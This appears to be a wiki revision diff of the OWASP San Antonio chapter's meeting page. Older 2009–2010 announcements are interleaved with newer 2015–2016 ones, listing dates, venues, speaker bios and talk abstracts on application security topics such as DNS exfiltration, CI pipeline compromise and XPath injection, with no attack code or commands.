Dates are set - speakers and topics are firming up as well speak.  All meetings are from 11:30am - 1:00pm at the San Antonio Technology Center (Web Room) 3463 Magic Drive San Antonio, TX 78229.
 
  
Wednesday January 20th - OWASP LiveCD: An Open Environment for Web Application Security by Matt Tesauro
+
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
  
Wednesday March 17th - TBD
 
  
Wednesday May 19th - TBD
 
  
Wednesday July 21st - TBD
+
Join us for the June OWASP San Antonio meeting!
  
Wednesday September 15th - TBD
 
  
Wednesday November 10th - TBD
+
We will have a talk about Automated DNS Data Exfiltration and Mitigation .
  
  
'''San Antonio OWASP Chapter: Wed January 20th, 2010'''
+
Speakers: Nolan Berry, Towne Besel, Cory Schwartz
  
Topic: OWASP LiveCD: An Open Environment for Web Application Security
 
Presenter: Matt Tesauro, OWASP Board Member, LiveCD Project Lead
 
Date: Wednesday January 20th, 2010 11:30am – 1:00pm
 
Location:
 
San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
 
  
Abstract:
+
Bios: Nolan Berry is a Linux Systems Engineer on the Network Operations DNS Infrastructure team at Rackspace.
The OWASP Live CD is a project that collects some of the best open source security projects in a single environment. Web developers, testers and security professionals can boot from this Live CD and have access to a full security testing suite. This allows its users to test for various security issues in web applications and web sites. The Live CD also contains documentation and an interactive learning environment to enhance users’ web application security knowledge. This presentation will cover the current state of the OWASP Live CD as well as the plans for future developments. Time permitting, a live demonstration of the OWASP Live CD will be conducted. The OWASP Live CD is a project of the Open Web Application Security Project (OWASP) and is free for commercial or non-commercial use. More information is available at: http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project
 
  
Presenter Bio:
+
Towne Besel is a Security Engineer on the Network Operations DDoS Team at Rackspace.
Matt Tesauro has worked in web application development and security since 2000. He has worn many different hats, from developer to DBA to System Administrator to Penetration Tester. Matt also taught graduate and undergraduate classes on web application development and XML at
 
Texas A&M University. Currently, he's focused on implementing a comprehensive web application security program for the Texas Education Agency (TEA).  Outside work, he is a member of the OWASP Foundation's Board of Directors, the project lead for the OWASP Live CD, a member of the OWASP Global Projects Committee, assists the OWASP Austin chapters leadership and a member of ISSA of Austin, Texas. Matt Tesauro has a B.S. in Economics and a M.S in Management Information Systems from Texas A&M University. He is also has the CISSP, CEH (Certified Ethical Hacker), RHCE (Red Hat Certified Engineer), and Linux+ certifications.
 
  
Sodas and snacks will be provided.  Feel free to bring a brown-bag lunch.
+
Cory Schwartz is a Linux Operations Engineer on the Rackspace Cloud Storage Team.
  
Please RSVP: E-mail [email protected]  or call (210) 572-4400.
 
  
 +
Title: Automated DNS Data Exfiltration and Mitigation
  
  
Recent Meetings:
+
Abstract: Come and learn about DNS based data exfiltration and see it in action.  We will show you how a few simple scripts we wrote can steal data from a secure network almost without detection using obfuscated DNS lookups.  We will cover the concepts, perform a live demo, and show you how to detect this type of malicious activity.
  
 +
http://www.meetup.com/OWASP-San-Antonio/events/233427790/
  
'''San Antonio OWASP Chapter: October 21, 2009'''
 
  
Topic: Rolling Out an Enterprise Source Code Review Program
 
  
Presenter: Dan Cornell, Principal at Denim Group
+
'''OWASP San Antonio - June 23, 2016 @ 11:30am'''
Date: October 21, 2009 11:30 a.m. – 1:00 p.m.
 
  
Location:
 
San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
  
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
+
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
  
Abstract:
 
Source code review technology has rapidly advanced over the past several years and offers great promise of helping organizations detect and address software security defects.  However, many organizations stumble as they try to roll out these technologies because they fail to understand the people and process issues that must also be addressed.  This talk will present lessons learned from the creation of several enterprise source code review programs, including: identifying all sources of custom code in an organization including custom extensions to ERP systems and enterprise portals, selecting the first round of applications to scan and successfully interpreting results and driving resolution to identified issues.
 
  
  
Presenter Bio:
+
Join us for the June OWASP San Antonio meeting!
Dan Cornell has over ten years of experience architecting and developing web-based software systems. As CTO of Denim Group, he leads the organization’s technology team overseeing methodology development and project execution for Denim Group’s customers. He also heads the Denim Group security research team, investigating the application of secure coding and development techniques to the improvement of web-based software development methodologies.
 
 
   
 
   
Dan Cornell has performed as the CTO of BrandDefense, as founder and Vice President of Engineering for Atension prior to its acquisition by Rare Medium,  Inc. and as the Vice
 
President, Global Competency Leader for Rare Medium’s Java and Unix Competency Center. Cornell has also developed simulation applications for the Air Force with Southwest
 
Research Institute.
 
  
Dan was the founding coordinator and chairman for the Java Users Group of San Antonio (JUGSA) and is currently the chapter leader of the San Antonio chapter of the Open Web Application Security Project (OWASP). He is a recognized expert in the area of web application security for SearchSoftwareQuality.com and the primary author of Sprajax, Denim Group's open source tool for assessing the security of AJAX-enabled web applications.  
+
Note: New date is Thursday, June 23.
 +
 
 +
 
 +
We will have a talk about source-assisted web application penetration testing.
 +
 
 +
 
 +
Speaker: Dan Cornell
 +
 
 +
 
 +
Bio: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.
 +
 
 +
 
 +
Title: The ABCs of Source-Assisted Web Application Penetration Testing With OWASP ZAP: Attack Surface, Backdoors, and Configuration
 +
 
 +
 
 +
Abstract: There are a number of reasons to use source code to assist in web application penetration testing such as making better use of penetration testers’ time, providing penetration testers with deeper insight into system behavior, and highlighting specific sections of code so development teams can remediate vulnerabilities faster. Examples of these are provided using the open source ThreadFix plugin for the OWASP ZAP proxy and dynamic application security testing tool. These show opportunities attendees have to enhance their own penetration tests given access to source code.
 +
 
 +
This presentation covers the “ABCs” of source code assisted web application penetration testing: covering issues of attack surface enumeration, backdoor identification, and configuration issue discovery. Having access to the source lets an attacker enumerate all of the URLs and parameters an application exposes – essentially its attack surface. Knowing these allows pen testers greater application coverage during testing. In addition, access to source code can help to identify potential backdoors that have been intentionally added to the system. Comparing the results of blind spidering to a full attack surface model can identify items of interest such as hidden admin consoles or secret backdoor parameters. Finally, the presentation examines how access to source code can help identify configuration settings that may have an adverse impact on the security of the deployed application.
 +
 
 +
 
 +
 
 +
http://www.meetup.com/OWASP-San-Antonio/events/231594503/
 +
 
 +
 
 +
 
 +
'''OWASP San Antonio - May 20, 2016 @ 11:30am'''
 +
 
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the May OWASP San Antonio meeting! 
 +
 
 +
 
 +
Note: New date is Friday, May 20 to avoid Memorial Day conflicts.
 +
 
 +
 
 +
We will have a talk about Runtime Application Self-Protection (RASP).
 +
 
 +
 
 +
Speaker: Kunal Anand
 +
 
 +
Bio: Kunal is the co-founder and CTO of Prevoty, a next-generation application security platform. Prior to that, he was the Director of Technology at the BBC Worldwide, overseeing engineering and operations across the company’s global Digital Entertainment and Gaming initiatives. Kunal also has several years of experience leading security, data and engineering at Gravity, MySpace and NASA’s Jet Propulsion Laboratory. His work has been featured in Wired Magazine and Fast Company. He continues to develop the patented security technologies that power Prevoty’s core products. Kunal received a B.S. from Babson College.
 +
 
 +
Title: Runtime Application Self-Protection (RASP) Tools
 +
 
 +
Abstract: Kunal will be discussing Runtime Application Self-Protection (RASP) and a new high-performance methodology called language theoretic security (LANGSEC). Kunal will also break down how lexers, tokenizers and parsers work, and construct an open source toolchain to analyze data and explore interactive data visualizations -- covering the challenges of modern AppSec along the way.
 +
 
 +
http://www.meetup.com/OWASP-San-Antonio/events/231044053/
 +
 
 +
 
 +
 
 +
'''OWASP San Antonio - April 29, 2016 @ 11:30am'''
 +
 
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the April OWASP San Antonio meeting! We will have a talk about AppSec Pipelines!
 +
 
 +
 
 +
Speaker: Matt Tesauro
 +
 
 +
Bio: Matt Tesauro is the a founder and CTO of Infinitiv, a Senior Software Security Engineer at Pearson and was previously the Senior Product Security Engineer at Rackspace.  He is also an Adjunct Professor for the University of Texas Computer Science department teaching the next generation of CS students about Application Security.  Matt is broadly experienced information security professional of 15 years specializing in application and cloud security. He has also presented and provided trainings at various international industry events including DHS Software Assurance Workshop, OpenStack Summit, SANS AppSec Summit, AppSec US, EU and LATAM.  His work has included security consulting, penetration testing, threat modeling, code reviews, training and teaching at the University of Texas and Texas A&M University. He is a former board member of the OWASP Foundation and project lead for OWASP AppSec Pipeline & WTE projects. WTE is a collection of application security testing tools.  He holds two degrees from Texas A&M University and several security and Linux certifications.
 +
 
 +
Title: Taking AppSec to 11: AppSec Pipelines, DevOps and Making Things Better
 +
 
 +
Abstract:How many applications are in your company’s portfolio? What’s the headcount for your AppSec team? Whatever your situation is, I am sure the numbers are not in your favor. Its not time to find a new career, it's time to up your game. This talk will cover how to take your small merry band of AppSec professionals and scale it up to a virtual army. By taking the best of DevOps, Agile and CI/CD, you can iteratively up your AppSec game over time and begin your ascent out of the security hole you are in.
 +
 
 +
The talk covers real world experiences running AppSec groups at two different companies. Rackspace with approximately 4,000+ employees and Pearson with 40,000+. Both have an international presence and far more apps and developers that AppSec staff. The talk covers the key principles to speed and scale up AppSec programs using an AppSec Pipeline as well as practical examples of these practices put into use. Start early and begin to buy down the technical security dept which feels inevitable with more traditional AppSec program thinking.
 +
 
 +
 
 +
 
 +
'''OWASP San Antonio - March 25 @ 11:30am'''
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the March OWASP San Antonio meeting! We will have a talk about giving tech talks!
 +
 
 +
 
 +
Speaker: Major Hayden
 +
 
 +
 
 +
Bio: Major Hayden started at Rackspace in 2006 as a Linux support technician. Over the years, he has worked in support, software development, operations, and information security roles. Major currently works with the OpenStack Private Cloud team with a focus on operations and information security. He blogs frequently on major.io and has been known use Twitter from time to time.
 +
 
 +
Title: Taming the Technical Talk
 +
 
 +
Abstract: Many technical people inevitably find themselves up against the most terrifying challenge of their careers: giving a technical talk. Talking in front of large groups of people is never easy, but it can transform the future of software projects or the careers of individuals. This nerve-wracking career catalyst can be tamed, however, through careful planning and thoughtful delivery.
 +
 
 +
During this talk, we will embark on a journey to overcome our fears and deliver high quality technical talks to small or large groups. We will cover everything from the early stages, such as choosing a topic, all the way to the day of talk itself.
  
 +
http://www.meetup.com/OWASP-San-Antonio/events/228893612/
  
'''San Antonio OWASP Chapter: August 19, 2009'''
 
  
Topic: Web Application Firewalls (WAFs)
+
'''OWASP San Antonio - February 26 @ 11:30am'''
  
Presenter: Matt Burriola & Mario Flores, Randolph-Brooks Federal Credit Union
+
Denim Group
Date: August 19, 2009 11:30am – 1:00pm
+
1354 N Loop 1604 E Ste 110, San Antonio, TX
  
Location:
 
San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
  
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
+
Join us for the February OWASP San Antonio meeting! We will have a talk about Automated API testing!
 +
 
 +
 
 +
Speaker: Matt Valdes
 +
 
 +
 
 +
Bio: Matt Valdes is a Security Developer in Test on the Security and Quality Engineering team at Rackspace. Throughout his career, he has been involved in all aspects of the SDLC and is passionate about security testing, process engineering and automation.
 +
 
 +
 
 +
Title: Automating Security Tests for APIs
 +
 
 +
 
 +
Abstract:RESTful APIs are an increasingly common attack vector for applications. Despite this ever-present threat, open source and commercial vendor support for automatic API security scanners remains limited. With the rate at which APIs are developed, enhanced and deployed, this lack of security test automation creates a gap that at its best limits adoption, and at its worst may leave an application open to attack. To fill the gap in security testing efficiency, members of the Rackspace Quality Engineering and Security Engineering teams worked together to create an Open Source, automated API security scanner.
 +
 
 +
Syntribos is a flexible, automated scanner that provides configurable test coverage for any HTTP API. Learn how Syntribos enables you to test HTTP APIs in an automated way, helping to detect and eliminate common security vulnerabilities such as SQL injection, command injection, denial of service attacks, and more.
 +
 
 +
https://github.com/openstack/syntribos
 +
 
 +
 
 +
 
 +
'''OWASP San Antonio - January 29 @ 11:30am'''
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the first OWASP San Antonio meeting of 2016! We will have a talk about XPath Attacks!
 +
 
 +
 
 +
Speaker: Luis Torres
 +
 
 +
 
 +
Bio: Luis Torres is a security consultant with VerSprite. An avid pen tester, researcher, CTF participant, and bug bounty winner - Luis is a key consultant for VerSprite's AppSec Consulting practice where he focuses his time on client-server, cloud, web services, and fat client security testing. His recent research has been around more damaging exploits around XPath injection which he seeks to share with you today.
 +
 
 +
 
 +
Title: XPath Awakens - Attacks & Impact Around XPath Injection
 +
 
 +
 
 +
Abstract: XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses XML. Threat agent goals are often aim to circumvent authentication and/or access information in an unauthorized manner.
 +
 
 +
 
 +
Developers today use XPaths to perform actions over XML based documents, however insecure coding practices could lead allow for injection issues to surface in web applications. Blind XPath Injection retrieves information by making true/false interrogations with web applications, however they mostly focus on retrieving current query information, skipping sensitive information on XML nodes outside of current query requests. This presentation will extend beyond these blind injection attacks and discuss how to retrieve the entire XML document, using Blind XPath Injection techniques.
 +
 
 +
 
 +
'''OWASP San Antonio - September 18 @ 11:30am'''
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the September 2015 OWASP San Antonio meeting! We will have a talk about detecting security breaches!
 +
 
 +
 
 +
Speaker: Josh Sokol
 +
 
 +
 
 +
Bio: Josh Sokol, CISSP, graduated from the University of Texas at Austin with a BS in Computer Science in 2002. Since that time, he has worked for several large companies, including AMD and BearingPoint, spent some time as a military contractor, and is currently employed as the Information Security Program Owner at National Instruments. In his current role, Sokol manages all compliance, security architecture, risk management, and vulnerability management activities for NI. Sokol created the free and open source risk management tool named SimpleRisk, has spoken on dozens of security topics including the much-hyped "HTTPSCan Byte Me" talk at Black Hat 2010, and currently serves on the OWASP Global Board of Directors.
 +
 
 +
Title: The Fox is in the Henhouse: Detecting a Breach Before the Damage is Done
 +
 
 +
Abstract: Your firewall is a sieve with more holes poked in it than your Grandmother's pin cushion, your IPS doesn't know a breach from a hole in the ground, and your signature-based anti-virus can't keep up with the ever changing tide of malware being hurled at you from every direction.  It's time to take a deep breath and admit to ourselves that the traditional methods of keeping the bad guys out of our networks have failed us.  Just over two years ago, we began focusing much of our efforts on incident detection and response.  Rather than sinking our precious time and money into tools that would become obsolete before the next BlackHat, we decided to take the time to analyze our networks and got creative with different ways to find the systems that have been compromised that those other technologies couldn't detect.  In this presentation, we will walk you through the analytics we are running, the tools that we are using, and the techniques that we employ to find and remediate the bad guys from our networks.  Good security doesn't have to break the bank; it just has to break the mold.
 +
 
 +
 
 +
 
 +
'''OWASP San Antonio - August 28th @ 11:30am'''
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the August 2015 OWASP San Antonio meeting! We will have a talk about building, sniffing and breaking Zigbee (IoT).
 +
 
 +
 
 +
Speaker: David Lister
 +
 
 +
Bio: David Lister (CISSP, CASP, CCISO, CCNA, CEH, ECSA, CPT, RHCSA, Security+ ) has also been active in various roles involving systems administration, network security, incident response, penetration testing, and application security. David holds a Master's degree in Infrastructure Assurance from the University of Texas San Antonio, and is a member of the ISSA, San Antonio Hackers Anonymous, and OWASP. 
 +
 
 +
Title: Building, Sniffing, and Breaking Zigbee
 +
 
 +
Abstract:This will be a shallow dive into how you can get up and running with Zigbee, what it is and what it’s used for. Also covered will be some of the known ways to break Zigbee networks, and how this relates to application security. 
 +
 
 +
 
 +
Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
 +
 
 +
http://www.meetup.com/OWASP-San-Antonio/events/224725183/
 +
 
 +
 
 +
 
 +
'''OWASP San Antonio - July 31st @ 11:30am'''
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the July 2015 OWASP San Antonio meeting! We will be having a talk about compromising Continuous Integration systems.
 +
 
 +
 
 +
Speaker: Greg Anderson
 +
 
 +
Bio: Greg Anderson works for Rackspace where he helps to drive test automation and security.
 +
 
 +
Title: Is This Your Pipe? Compromising Build and Automation Pipelines
 +
 
 +
Abstract: As developers of the web, we rely on tools to automate building code, run tests, and even deploy services. What happens when developers do CI/CD wrong? Credentials get exposed, hijacked, and re-purposed. I'll talk about how often, where, and what happens when people leak public cloud credentials, how some are protecting themselves using encrypted secrets, how to bypass protections against leaking secrets and how to turn someone's Jenkins Install into your own butler. Come hijack credentials out of repositories, steal hidden and encrypted secrets using builds, and hijack infrastructure via continuous integration systems.
 +
 
 +
 
 +
 
 +
Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
 +
 
 +
http://www.meetup.com/OWASP-San-Antonio/events/223970537/
 +
 
 +
 
 +
 
 +
'''OWASP San Antonio - June 26th @ 11:30am'''
 +
 
 +
Denim Group - 1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
Join us for the June 2015 OWASP San Antonio meeting. We will be having a talk about Continuous Integration and Continuous Deployment (CI/CD) of OpenStack.
 +
 
 +
 
 +
Speaker: Michael Xin
 +
 
 +
Bio: Michael Xin is working as a manager of security engineering in Rackspace. Before that, he worked as a senior application security engineer in Scottrade Inc. Michael is interested in web application / web service / API security, mobile application security and cloud security. Michael has years of experience with application security assessment, security code review and security SDLC.
 +
 
 +
Title: OpenStack Security CI/CD Way
 +
 
 +
Abstract: As OpenStack becomes popular, Continuous Integration and Continuous Deployment (CI/CD) of OpenStack is gaining attention. Customers need the ability to deploy multiple times every day to meet their business needs. This is a huge challenge to application security.  Traditional web application security testing and API security testing are manual processes aided by various tools. The tests are time consuming and lack consistence. It is almost impossible to embed these types of security testing into CI/CD process.
 +
 
 +
In Rackspace, security engineering team is working with quality engineers and developers to integrate security testing into CI/CD process. Security engineering team uses the same framework/tool that quality engineer use to ease integration. Currently we are focusing on API security testing automation and web application security testing. We are working on a couple of approaches to integrate security-testing cases with QE testing framework. The security test cases cover necessary security checks including common security vulnerability checks and some product specific checks. These security test cases can be run by anyone from the team. They can also be invoked as Jenkins jobs as part of integration test. The failed security test cases indicate some types of security defects and need to be remediated.
 +
 
 +
The security testing automation improves the consistency, repeatability and auditability of our security testing process. Security testing within CI/CD process can detect security defect in early stage and reduce remediation costs.
 +
 
 +
Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
 +
 
 +
http://www.meetup.com/OWASP-San-Antonio/events/223161579/
 +
 
 +
The link of the slides: http://www.slideshare.net/michaelxin2015/openstack-security-cicd-way
 +
 
 +
The links of the tools:
 +
https://github.com/stackforge/opencafe
 +
https://wiki.openstack.org/wiki/Security/Projects/Bandit
 +
 
 +
 
 +
 
 +
'''OWASP San Antonio - May 29, 2015 @ 11:30am'''
 +
 
 +
Denim Group - 1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
Join us for the May 2015 OWASP San Antonio meeting. We will be having a talk about Mobile Application Security Assessments.
 +
 
 +
Speaker: Dan Cornell
 +
 
 +
Bio: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As Chief Technology Officer and Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process.
 +
 
 +
Title: Application Security Assessments By The Numbers: A Whole-Istic View
  
 
Abstract:
 
Abstract:
Web Application Firewalls
 
Web application firewalls (WAFs) have gained considerable momentum as web vulnerabilities have grown.  WAFs now have a proven record of reducing exposures to web vulnerabilities by blocking malicious activity much like a typical firewall.  While WAFs help, it does take time to consider when a WAF is appropriate.  It also takes time to evaluate and implement the WAF as well.  Come listen to reasons why Randolph-Brooks Federal Credit Union chose a WAF and what they learned in the process.
 
  
Presenter Bio:
+
By analyzing the data from over 60 mobile application security assessments, we identify the typical types of mobile vulnerabilities, the system components that contain those vulnerabilities, the components where given types of vulnerabilities cluster, and how to test for each of these. Attendees will learn in the session how to identify these vulnerabilities, how to create and implement an effective mobile security plan, and where to focus their limited testing resources to minimize mobile application portfolio risks. This is critical because automated web application testing tools are able to easily find vulnerabilities while today’s mobile security industry does not offer automated testing tools that can effectively test web services (i.e. the interaction between mobile clients and back-end services.) As a result, best practices for mobile application testing must incorporate significant, often laborious, manual testing. At this point in the presentation, we will use the statistics from the research to define the appropriate manual testing that needs to be implemented.
Matt is a Senior Developer on the RBFCU Web Team, but mainly serves the roles of Configuration Management lead and Systems Admin for the team. Matt maintains the source control repository, application build and release processes, and QA server environments. Matt also works on web infrastructure initiatives such as Web Application Firewall.  Matt has 10 years IT industry experience, including Java/web technologies, C, C++, Unix/Linux, shell scripting, and Symbol mobile handheld programming. Matt has a degree in Management Information Systems from Texas A&M University-Corpus Christi.
+
 
 +
Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
  
Mario is currently the Web Development manager for RBFCU. In this current role, Mario manages the development efforts for the online banking site and the intranet.  Mario also has a solid background in web security and has addressed issues with web application penetration assessments.  Mario has worked for RBFCU for 14 years and he has a degree in Information Systems from Texas Lutheran University.
+
http://www.meetup.com/OWASP-San-Antonio/events/222536787/
  
  
 +
'''OWASP Invites You to Attend InnoTech San Antonio as our Guest'''
  
'''San Antonio OWASP Chapter: June 17, 2009''''
+
InnoTech, presented by Presidio, is San Antonio’s premiere IT and security focused conference & expo. We're celebrating eight years of education, technology and networking at this year's event and you won't want to miss it! Mark your calendars now and plan on attending!
Topic: What is Cross Site Scripting And Why Is It bad?
 
Date: June 17, 2009 11:30am – 1:00pm
 
Location:
 
San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
  
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
+
Thursday, April 9, 2015 at the Henry B. Gonzalez Convention Center
  
Abstract:
+
A limited number of complimentary passes are available for InnoTech San Antonio. Please register at innotechsan.com and use the discount code that you received from your OWASP email list for complimentary admission.  Includes coffee, lunch for the first 125 in line and afternoon reception.
The presentation will cover background information on cross-site scripting (XSS) attacks as well as real world examples of what can happen when this type of vulnerability is present and the different ways that it can be exploitedThe presentation will also include language agnostic ways to mitigate this sort of risk and how developers and security professionals can identify these risks.
+
 
 +
Check out the list of speakers and technology demos by visiting http://www.innotechconferences.com/sanantonio/
 +
 
 +
 
 +
'''OWASP San Antonio - March 20th 2015'''
 +
 
 +
On March 20th the OWASP San Antonio Chapter is having a FREE one day, single track, conference featuring talks about secure software development, securing the SDLC and application security testing. Whether you’re an information security professional, software developer, or just interested in computer security, anyone and everyone is welcome. We have an all-star set of speakers that will be covering all aspects of managing a security program as well as in depth testing methodologies.
 +
 
 +
Map:
 +
 
 +
http://bit.ly/owasp-map
 +
 
 +
Full Program:
 +
 
 +
http://bit.ly/owasp-program
 +
 
 +
Schedule:
 +
 
 +
 
 +
9:15 - 9:30
 +
Welcome, Sign-in, kickoff
 +
 
 +
9:30 - 10:30: Keynote, Scaling an Application Security Program, Glenn Leifheit, Principal Security Architect, Microsoft
 +
 
 +
One of the largest challenges today is the rapid change in speed of software.  We will journey on the path of accelerating but maintaining security, From Small Startup to Largest Enterprise, From Waterfall to Agile.  Along the way there will be lessons learned, from successes and failures.  What steps can you take to bring security to the next level. Application security is not an easy profession, let’s learn together to take us all to the next level.
 +
 
 +
About Glenn: Glenn Leifheit is Principal Security Architect for Microsoft Information Technology's ACE (Assessment, Consulting and Engineering) Team. In this role he provides security advice to Microsoft internally as well as external customers. Prior to joining Microsoft, Glenn created, developed and led the application security program for FICO (Fair Isaac Corporation). He also lead FICO’s PCI program. He is also a former co-chair and current member of (ISC)2 Application Security Advisory Council where he helps evangelize for strong application security and advocates for change throughout the industry. Through Glenn's 20 year career in information technology he has focused on security, architecture, OS and middleware design, and operations along with software development. Glenn holds both a CISSP and the CSSLP certifications. He is also passionate about evangelizing security practices to the development community, engaging in over 50 conferences, users groups and code camps as a speaker or panel member. Glenn is also a founding member of TechMasters, a Toastmasters group designed to create a technical speaker community.
 +
 
 +
10:30 - 11:30: Maximizing Security with Minimal Resources, Chris Maier, Principal Architect, Rackspace
 +
 
 +
Ever wonder how to intelligently spend your security dollars on the systems that matter most?  Are you faced with the common problem of " I don't have an unlimited security budget but I am required to secure all the things"?  This session will present concepts, methodologies, and tooling to help you identify your critical systems, set a prescriptive value on your data assets, and rank the systems and information in a way that helps highlight where you should focus your security efforts and dollarsWe will also cover how to present this information in a manner that is more business focused, and to ensure that the business understands the risk vs. reward of securing and protecting each of the assets.
 +
 
 +
About Chris: Chris Maier is a Principal Architect at Rackspace, and in his current role helps design and implement shared infrastructure systems in a secure and compliant manner.  Chris has nearly 18 years of production operations experience on a variety of systems including email, identity, databases, directory servers, and a variety of applications servers.  Chris has written scripts and code in Bash, VB, Java, C, C++, and a little python for many of the systems  he has supported over the years.  Because of the 10 plus years spent on identity and authentication systems, Chris is very cognizant of and familiar with a wide variety of security issues and security best practices.  Some of Chris' previous positions have included primary DBA for a SOX & PCI compliant billing system, identity infrastructure lead engineer, hosted exchange lead engineer, infrastructure systems lead engineer, and eLearning lead engineer.
 +
 
 +
 
 +
11:30 - 12:45: Lunch (provided)
 +
 
 +
12:45 - 1:45: Convincing Your Management, Your Peers, and Yourself that Risk Management Doesn’t Suck, Josh Sokol, Information Security Program Owner, National Instruments
  
Presenter Bio:
+
As security professionals, almost every action we take comes down to making a risk-based decision. Web application vulnerabilities, malware infections, physical vulnerabilities, and much more all boils down to some combination of the likelihood of an event happening and the impact of that event. Risk management is a relatively simple concept to grasp, but the place where many practitioners fall down is in the tool set.  
David is currently a Security Architect for Rackspace IT Hosting.  In this current role, David is responsible for designing and implementing network security solutions, as well as software development in support of automation. In previous roles he was a software developer on various projects written in a mix of PHP, Python, Perl, Ruby, c#, and asp.net. Prior to Rackspace, David worked for Digital Defense and he holds a B.B.A. in Information Systems from the University of Texas San Antonio. He also has an extensive background in application security and is actively researching botnet mitigation techniques. 
 
Certifications held include CISSP, RHCE, and CCNA.
 
  
 +
The lucky security professionals work for companies who can afford expensive GRC tools to aide in managing risk. The unlucky majority out there usually end up spending countless hours managing risk via spreadsheets. It's cumbersome, time consuming, and just plain sucks. After starting a Risk Management program from scratch at a $1B/yr company, I ran into these same barriers and where budget wouldn't let me go down the GRC route, I finally decided to do something about it. SimpleRisk is a simple and free tool to perform risk management activities.
  
 +
Based entirely on open source technologies and sporting a Mozilla Public License 2.0, a SimpleRisk instance can be stood up in minutes and instantly provides the security professional with the ability to submit risks, plan mitigations, facilitate management reviews, prioritize for project planning, and track regular reviews. It is highly configurable and includes dynamic reporting and the ability to tweak risk formulas on the fly. It is under active development with new features being added all the time and can be downloaded for free or demoed at http://www.simplerisk.org. With a simple, powerful, and cost-effective tool and some basic risk management knowledge at your disposal, you too can become the security rock star that your business seeks out for risk-based decision making. Let me show you how to convince your management, your peers, and yourself that Risk Management doesn't suck.
  
'''San Antonio OWASP Chapter: January 2009 Meeting'''
+
About Josh: Josh Sokol, CISSP, graduated from the University of Texas at Austin with a BS in Computer Science in 2002. Since that time, he has worked for several large companies, including AMD and BearingPoint, spent some time as a military contractor, and is currently employed as the Information Security Program Owner at National Instruments. In his current role, Sokol manages all compliance, security architecture, risk management, and vulnerability management activities for NI. Sokol created the free and open source risk management tool named SimpleRisk, has spoken on dozens of security topics including the much-hyped “HTTPSCan Byte Me” talk at Black Hat 2010, and currently serves on the OWASP Global Board of Directors.
  
Topic: "Vulnerability Management in an Application Security World."
 
  
Presenter: Dan Cornell, Principal, Denim Group
+
1:45 - 2:45: Automating Security Tests with Selenium, Brady Vitrano, Lead Quality Engineer, Rackspace, Charles Neill, Security Engineer, Rackspace
Date: January 29, 2009 11:30am – 1:00pm
 
  
Location:
+
Rackspace Quality and Security Engineers are building a framework to automate both functional testing and security testing within the browser. To learn about the basics, this presentation looks at our approach to automating functional testing and security testing for web applications. You will learn about Selenium, and how to write some tests of your own. We will also teach you how to run your test cases using a Selenium grid to speed up the testing process.
  
San Antonio Technology Center (Web Room)
+
About Brady: Brady is an aspiring mad scientist.
3463 Magic Drive
 
San Antonio, TX 78229
 
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
 
  
Abstract:Identifying application-level vulnerabilities via penetration tests and code reviews is only the first step in actually addressing the underlying risk.  Managing vulnerabilities for applications is more challenging than dealing with traditional infrastructure-level vulnerabilities because they typically require the coordination of security teams with application development teams and require security managers to secure time from developers during already-cramped development and release schedules. In addition, fixes require changes to custom application code and application-specific business logic rather than the patches and configuration changes that are often sufficient to address infrastructure-level vulnerabilities.
+
About Charles: Charles is a Security Developer - Test II for Security Engineering team at Rackspace. He enjoys finding new vulnerabilities in everything from webapps to smart TVs.
This presentation details many of the pitfalls organizations encounter while trying to manage application-level vulnerabilities as well as outlines strategies security teams can use for communicating with development teams.  Similarities and differences between security teams’ practice of vulnerability management and development teams’ practice of defect management will be addressed in order to facilitate healthy communication between these groups.
 
  
Presenter Bio:
+
The slides download link: https://www.owasp.org/images/4/49/Owasp_automation_talk.pptx
  
